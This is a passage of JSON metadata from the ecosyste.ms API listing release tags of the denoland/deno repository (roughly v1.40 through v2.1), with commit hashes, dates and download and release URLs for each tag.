g_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.